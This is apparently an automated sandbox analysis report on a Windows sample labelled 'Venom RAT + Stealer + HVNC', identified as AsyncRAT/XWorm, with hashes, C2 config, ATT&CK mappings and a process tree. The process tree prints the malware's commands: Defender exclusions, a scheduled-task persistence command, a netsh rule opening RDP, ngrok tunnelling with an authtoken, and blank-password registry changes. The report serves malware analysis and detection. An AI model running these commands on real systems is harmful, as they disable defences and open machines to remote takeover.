asyncrat | 8b5773001a13cd82f47b129c4673c2fdfe9a19852825a72b1231f6333cd22951

Analysis

max time kernel
292s
max time network
294s
platform
windows11-21h2_x64
resource
win11-20240709-en
resource tags

arch:x64arch:x86image:win11-20240709-enlocale:en-usos:windows11-21h2-x64system
submitted
13-07-2024 19:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Venom RAT + Stealer + HVNC.exe
Size

14.3MB
MD5

d9a91babacaf65923e28841d7995b80c
SHA1

57df4208c6a87ef881cf2021a1ad431a21456248
SHA256

8b5773001a13cd82f47b129c4673c2fdfe9a19852825a72b1231f6333cd22951
SHA512

6e0eb14b2a14d35884dd6d4505ea78d28ae6cee6ec59cabcb9a2499f63539d217196d7afca7b8e299ca8c9b447218f421c5372ebbd0167fbe2d803c68125c6bc
SSDEEP

393216:w2CdPoVETWa1Z4c80Gz/e5Yyb0Pn1a7kIGvZscp1Ae8A:wWIWa1acPGC5Yyb0PnikXZ1p198

Score

10^/10

asyncrat xworm evasion execution persistence privilege_escalation rat trojan

Malware Config

Extracted

Family

xworm

Version

3.0

147.185.221.20:49485

Attributes

Install_directory
%Public%
install_file
RtkAudUService32.exe

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral3/files/0x000a000000028cde-12.dat	family_xworm
behavioral3/memory/388-15-0x0000000000870000-0x000000000088A000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
1448	powershell.exe
3932	powershell.exe
3448	powershell.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
124	netsh.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDll = "%ProgramFiles%\\RDP Wrapper\\rdpwrap.dll"	RDPWInst.exe

Allows Network login with blank passwords 1 TTPs 1 IoCs

Allows local user accounts with blank passwords to access device from the network.

Remote Desktop Protocol

T1021.001

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\LimitBlankPasswordUse = "0"	System.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	System.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk	System.exe

Executes dropped EXE 14 IoCs

pid	Process
388	System.exe
2660	Venom RAT + HVNC + Stealer + Grabber.exe
3704	System.exe
4404	System.exe
3492	System.exe
3320	System.exe
3704	ngrok.exe
3884	ngrok.exe
1288	ngrok.exe
240	RDPWInst.exe
2560	ngrok.exe
2664	System.exe
4736	RDPWInst.exe
1368	ngrok.exe

Loads dropped DLL 1 IoCs

pid	Process
1336	svchost.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3637748876-3197268895-3385380113-1000\Software\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Public\\System.exe"	System.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
1	ip-api.com

Modifies WinLogon 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AllowMultipleTSSessions = "1"	RDPWInst.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System32\rfxvmt.dll	RDPWInst.exe

Drops file in Program Files directory 4 IoCs

description	ioc	Process
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	System.exe
File opened for modification	C:\Program Files\RDP Wrapper\rdpwrap.ini	System.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.ini	RDPWInst.exe
File created	C:\Program Files\RDP Wrapper\rdpwrap.dll	RDPWInst.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File created	C:\Windows\System.exe	Venom RAT + Stealer + HVNC.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
5056	timeout.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
3624	taskkill.exe
5044	taskkill.exe
4820	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3880	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
388	System.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

pid	Process
1448	powershell.exe
1448	powershell.exe
3932	powershell.exe
3932	powershell.exe
3448	powershell.exe
3448	powershell.exe
388	System.exe
3704	ngrok.exe
3704	ngrok.exe
3704	ngrok.exe
3704	ngrok.exe
3884	ngrok.exe
3884	ngrok.exe
3884	ngrok.exe
3884	ngrok.exe
1288	ngrok.exe
1288	ngrok.exe
1288	ngrok.exe
1288	ngrok.exe
1336	svchost.exe
1336	svchost.exe
1336	svchost.exe
1336	svchost.exe
2560	ngrok.exe
2560	ngrok.exe
2560	ngrok.exe
2560	ngrok.exe
1368	ngrok.exe
1368	ngrok.exe
1368	ngrok.exe
1368	ngrok.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
688	Process not Found

Suspicious use of AdjustPrivilegeToken 15 IoCs

description	pid	Process
Token: SeDebugPrivilege	388	System.exe
Token: SeDebugPrivilege	1448	powershell.exe
Token: SeDebugPrivilege	3932	powershell.exe
Token: SeDebugPrivilege	3448	powershell.exe
Token: SeDebugPrivilege	388	System.exe
Token: SeDebugPrivilege	3704	System.exe
Token: SeDebugPrivilege	4404	System.exe
Token: SeDebugPrivilege	3492	System.exe
Token: SeDebugPrivilege	3320	System.exe
Token: SeDebugPrivilege	5044	taskkill.exe
Token: SeDebugPrivilege	3624	taskkill.exe
Token: SeDebugPrivilege	4820	taskkill.exe
Token: SeDebugPrivilege	240	RDPWInst.exe
Token: SeAuditPrivilege	1336	svchost.exe
Token: SeDebugPrivilege	2664	System.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
388	System.exe

Suspicious use of WriteProcessMemory 47 IoCs

description	pid	Process	procid_target
PID 2108 wrote to memory of 388	2108	Venom RAT + Stealer + HVNC.exe	78
PID 2108 wrote to memory of 388	2108	Venom RAT + Stealer + HVNC.exe	78
PID 2108 wrote to memory of 2660	2108	Venom RAT + Stealer + HVNC.exe	79
PID 2108 wrote to memory of 2660	2108	Venom RAT + Stealer + HVNC.exe	79
PID 388 wrote to memory of 1448	388	System.exe	84
PID 388 wrote to memory of 1448	388	System.exe	84
PID 388 wrote to memory of 3932	388	System.exe	86
PID 388 wrote to memory of 3932	388	System.exe	86
PID 388 wrote to memory of 3448	388	System.exe	88
PID 388 wrote to memory of 3448	388	System.exe	88
PID 388 wrote to memory of 3880	388	System.exe	90
PID 388 wrote to memory of 3880	388	System.exe	90
PID 388 wrote to memory of 5044	388	System.exe	96
PID 388 wrote to memory of 5044	388	System.exe	96
PID 388 wrote to memory of 3704	388	System.exe	99
PID 388 wrote to memory of 3704	388	System.exe	99
PID 388 wrote to memory of 3704	388	System.exe	99
PID 388 wrote to memory of 3624	388	System.exe	101
PID 388 wrote to memory of 3624	388	System.exe	101
PID 388 wrote to memory of 3884	388	System.exe	103
PID 388 wrote to memory of 3884	388	System.exe	103
PID 388 wrote to memory of 3884	388	System.exe	103
PID 388 wrote to memory of 4820	388	System.exe	105
PID 388 wrote to memory of 4820	388	System.exe	105
PID 388 wrote to memory of 1288	388	System.exe	107
PID 388 wrote to memory of 1288	388	System.exe	107
PID 388 wrote to memory of 1288	388	System.exe	107
PID 388 wrote to memory of 240	388	System.exe	109
PID 388 wrote to memory of 240	388	System.exe	109
PID 388 wrote to memory of 240	388	System.exe	109
PID 240 wrote to memory of 124	240	RDPWInst.exe	113
PID 240 wrote to memory of 124	240	RDPWInst.exe	113
PID 388 wrote to memory of 2560	388	System.exe	114
PID 388 wrote to memory of 2560	388	System.exe	114
PID 388 wrote to memory of 2560	388	System.exe	114
PID 388 wrote to memory of 4736	388	System.exe	117
PID 388 wrote to memory of 4736	388	System.exe	117
PID 388 wrote to memory of 4736	388	System.exe	117
PID 388 wrote to memory of 1368	388	System.exe	119
PID 388 wrote to memory of 1368	388	System.exe	119
PID 388 wrote to memory of 1368	388	System.exe	119
PID 388 wrote to memory of 4772	388	System.exe	121
PID 388 wrote to memory of 4772	388	System.exe	121
PID 388 wrote to memory of 4608	388	System.exe	123
PID 388 wrote to memory of 4608	388	System.exe	123
PID 4608 wrote to memory of 5056	4608	cmd.exe	125
PID 4608 wrote to memory of 5056	4608	cmd.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\Venom RAT + Stealer + HVNC.exe
"C:\Users\Admin\AppData\Local\Temp\Venom RAT + Stealer + HVNC.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2108
- C:\Windows\System.exe
  "C:\Windows\System.exe"
  2⤵
  - Allows Network login with blank passwords
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Drops file in Program Files directory
  - Suspicious behavior: AddClipboardFormatListener
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'System.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3932
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\System.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3448
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System" /tr "C:\Users\Public\System.exe"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:3880
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /im ngrok.exe /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:5044
- - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
    C:\Users\Admin\AppData\Local\Temp\ngrok.exe config add-authtoken 2de1vjfbhkIf8u2KTB3aNDqCqDw_59TGvKSA8VjcZZgKgDVQR
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3704
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /im ngrok.exe /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3624
- - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
    C:\Users\Admin\AppData\Local\Temp\ngrok.exe config add-authtoken 2de1vjfbhkIf8u2KTB3aNDqCqDw_59TGvKSA8VjcZZgKgDVQR
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:3884
- - C:\Windows\System32\taskkill.exe
    "C:\Windows\System32\taskkill.exe" /im ngrok.exe /f
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:4820
- - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
    C:\Users\Admin\AppData\Local\Temp\ngrok.exe config add-authtoken 2de1vjfbhkIf8u2KTB3aNDqCqDw_59TGvKSA8VjcZZgKgDVQR
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1288
- - C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe
    "C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe" -i
    3⤵
    - Server Software Component: Terminal Services DLL
    - Executes dropped EXE
    - Modifies WinLogon
    - Drops file in System32 directory
    - Drops file in Program Files directory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:240
  - - C:\Windows\SYSTEM32\netsh.exe
      netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
      4⤵
      Modifies Windows Firewall
      Event Triggered Execution: Netsh Helper DLL
      PID:124
- - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
    "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:2560
- - C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe
    "C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe" -i
    3⤵
    - Executes dropped EXE
    PID:4736
- - C:\Users\Admin\AppData\Local\Temp\ngrok.exe
    "C:\Users\Admin\AppData\Local\Temp\ngrok.exe" tcp 3389
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    PID:1368
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /delete /f /tn "System"
    3⤵
    PID:4772
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp1F18.tmp.bat""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4608
  - - C:\Windows\system32\timeout.exe
      timeout 3
      4⤵
      Delays execution with timeout.exe
      PID:5056
- C:\Users\Admin\AppData\Local\Temp\Venom RAT + HVNC + Stealer + Grabber.exe
  "C:\Users\Admin\AppData\Local\Temp\Venom RAT + HVNC + Stealer + Grabber.exe"
  2⤵
  - Executes dropped EXE
  PID:2660

C:\Users\Public\System.exe
C:\Users\Public\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3704

C:\Users\Public\System.exe
C:\Users\Public\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4404

C:\Users\Public\System.exe
C:\Users\Public\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3492

C:\Users\Public\System.exe
C:\Users\Public\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3320

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
PID:972

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -s TermService
1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1336

C:\Users\Public\System.exe
C:\Users\Public\System.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2664

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Remote Services

T1021

Remote Desktop Protocol

T1021.001

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\System.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
d0a4a3b9a52b8fe3b019f6cd0ef3dad6

SHA1
fed70ce7834c3b97edbd078eccda1e5effa527cd

SHA256
21942e513f223fdad778348fbb20617dd29f986bccd87824c0ae7f15649f3f31

SHA512
1a66f837b4e7fb6346d0500aeacb44902fb8a239bce23416271263eba46fddae58a17075e188ae43eb516c841e02c87e32ebd73256c7cc2c0713d00c35f1761b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
80b42fe4c6cf64624e6c31e5d7f2d3b3

SHA1
1f93e7dd83b86cb900810b7e3e43797868bf7d93

SHA256
ee20a5b38a6674366efda276dbbf0b43eb54efd282acfc1033042f6b53a80d4d

SHA512
83c1c744c15a8b427a1d3af677ec3bfd0353875a60fe886c41570981e17467ebbb59619b960ca8c5c3ab1430946b0633ea200b7e7d84ab6dca88b60c50055573

Download Submit
C:\Users\Admin\AppData\Local\Temp\RDPWInst.exe

Filesize
1.4MB

MD5
3288c284561055044c489567fd630ac2

SHA1
11ffeabbe42159e1365aa82463d8690c845ce7b7

SHA256
ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753

SHA512
c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02

Download Submit
C:\Users\Admin\AppData\Local\Temp\Venom RAT + HVNC + Stealer + Grabber.exe

Filesize
14.2MB

MD5
3b3a304c6fc7a3a1d9390d7cbff56634

SHA1
e8bd5244e6362968f5017680da33f1e90ae63dd7

SHA256
7331368c01b2a16bda0f013f376a039e6aeb4cb2dd8b0c2afc7ca208fb544c58

SHA512
7f1beacb6449b3b3e108016c8264bb9a21ecba526c2778794f16a7f9c817c0bbd5d4cf0c208d706d25c54322a875da899ab047aab1e07684f6b7b6083981abe5

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_r1wubft5.zoh.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ngrok.exe

Filesize
16.4MB

MD5
ee2397b5f70e81dd97a4076ba1cb1d3a

SHA1
8350f648ebd269b4bca720b4143dd3edcdfafa8f

SHA256
b5b1454e2e3a66edf3bde92b29a4f4b324fa3c3d88dc28e378c22cb42237cc67

SHA512
57fc76393881c504ac4c37a8ea812a7e21f2bed4ffa4de42a2e6e4558a78bba679ec0f8fcdc39798306c3a97e424fb875680b7f78ac07be3f7f58df093575562

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp1F18.tmp.bat

Filesize
135B

MD5
456a5b9fe6e58c95a21f4c1c1bef6e0c

SHA1
d91563f3ad2db660f9995ae6798f52809a5b9894

SHA256
5755688c74e03e0809a0e1ca0ccae9184e55ad035e228edebd7df882b101dc26

SHA512
21180a47b548510f026ff641a190e672455a5c9a374ae21b0d61c062417b1c5f9d6256ada5fa49bf5cf483f93e84a5bff11f19d67f5b3b80b540920a13606e8b

Download Submit
C:\Users\Admin\AppData\Local\ngrok\ngrok.yml

Filesize
74B

MD5
bba5b2391399c16d21db57bd7e890189

SHA1
4b5eabb00b80bd8322b77069e5e017e5289fd357

SHA256
d10af7343833d3e3db3d4d19237c967fa2d8d27b3737b4eb2d5ef90fd32c3a05

SHA512
c800e9a34c8cead8b91fb1f0b6d9bf4cf6e3e31d9073be242fe2a8de007c1693353923054113c0c8ba73446bff9fc92750b539bcfd6aaa5a42044ac9a772bd47

Download Submit
C:\Windows\System.exe

Filesize
76KB

MD5
a87e89722f01fad0ba63a165409aa1b6

SHA1
db66ceb27a9d35bd6f1826c1019d43c9b6116a8a

SHA256
c35a4341298f16eb875e646c79922b67759e86c0ab9348ad48bf95606c165eb5

SHA512
91225d1088f8fce5c2894e606f876177a630f851f9ec4a973de5b7a5f45a726085e2b22522c419d94d97679898ba355fbfc11190aa4c0290be5e14a73d27e109

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.dll

Filesize
114KB

MD5
461ade40b800ae80a40985594e1ac236

SHA1
b3892eef846c044a2b0785d54a432b3e93a968c8

SHA256
798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4

SHA512
421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26

Download Submit
\??\c:\program files\rdp wrapper\rdpwrap.ini

Filesize
296KB

MD5
21bfa3371785988973e4b39764ffe607

SHA1
a7e2c28ec3041e783545fb45a85c8911c588f4e3

SHA256
60714fd3064cd5e24cd1f7ecbe0038b288d5505d2a50aa001563b2c1fcc5eee0

SHA512
dc3aa52917e29dc4d7b11750f5b568b5a8f32c36fd21bdfb94ccf4c8f15a2c3d148aecfa5a344ca5c121a24f11cbabed0581703358a215ccd9a85f23e75ec78d

Download Submit
memory/240-118-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download
memory/388-85-0x000000001DDB0000-0x000000001E4BC000-memory.dmp

Filesize
7.0MB

Download
memory/388-14-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/388-76-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/388-77-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/388-32-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/388-82-0x000000001B540000-0x000000001B54A000-memory.dmp

Filesize
40KB

Download
memory/388-83-0x000000001CF50000-0x000000001D10A000-memory.dmp

Filesize
1.7MB

Download
memory/388-132-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/388-15-0x0000000000870000-0x000000000088A000-memory.dmp

Filesize
104KB

Download
memory/1448-38-0x0000024D9CDD0000-0x0000024D9CDF2000-memory.dmp

Filesize
136KB

Download
memory/2108-0-0x00007FFC87313000-0x00007FFC87315000-memory.dmp

Filesize
8KB

Download
memory/2108-28-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/2108-11-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/2108-1-0x0000000000210000-0x000000000105A000-memory.dmp

Filesize
14.3MB

Download
memory/2660-29-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/2660-30-0x0000021EB0BE0000-0x0000021EB1A14000-memory.dmp

Filesize
14.2MB

Download
memory/2660-31-0x00007FFC87310000-0x00007FFC87DD2000-memory.dmp

Filesize
10.8MB

Download
memory/4736-124-0x0000000000400000-0x000000000056F000-memory.dmp

Filesize
1.4MB

Download